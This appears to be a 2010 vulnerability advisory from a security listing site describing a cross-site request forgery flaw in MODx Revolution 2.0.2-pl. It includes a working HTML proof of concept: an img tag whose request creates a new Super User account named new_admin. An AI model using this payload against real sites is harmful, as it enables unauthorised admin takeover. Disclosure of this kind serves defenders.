MODx Revolution 2.0.2-pl cross site request forgery vulnerability

2010.09.30
Credit: John Leitch
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!------------------------------------------------------------------------ # Software................MODx Revolution 2.0.2-pl # Vulnerability...........Cross-site Request Forgery # Download................http://modxcms.com # Release Date............9/28/2010 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://www.johnleitch.net/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # A cross-site request forgery vulnerability in MODx Revolution 2.0.2-pl # can be exploited to create a new admin. # # # --PoC--> <html> <body> <img src="http://localhost/modx/connectors/security/user.php?action=create&modx-ab-stay=&groups=%5B%7B%22usergroup%22%3A%221%22%2C%22role%22%3A%222%22%2C%22member%22%3A%22%22%2C%22rolename%22%3A%22Super%20User%22%2C%22name%22%3A%22Administrator%22%2C%22menu%22%3Anull%7D%5D&extended=%7B%7D&HTTP_MODAUTH=modx4ca298fc3d92e9.21874888&id=0&newpassword=false&modx-user-fs-newpassword-checkbox=on&passwordnotifymethod=s&passwordgenmethod=spec&specifiedpassword=Password1&confirmpassword=Password1&username=new_admin&active=1&fullname=&email=x%40x.com&phone=&mobilephone=&address=&city=&fax=&state=&zip=&country=&website=&dob=&gender=&comment=&failedlogincount=&blockeduntil=&blockedafter=&extended_name=&extended_value=&extended_id=" /> </body> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top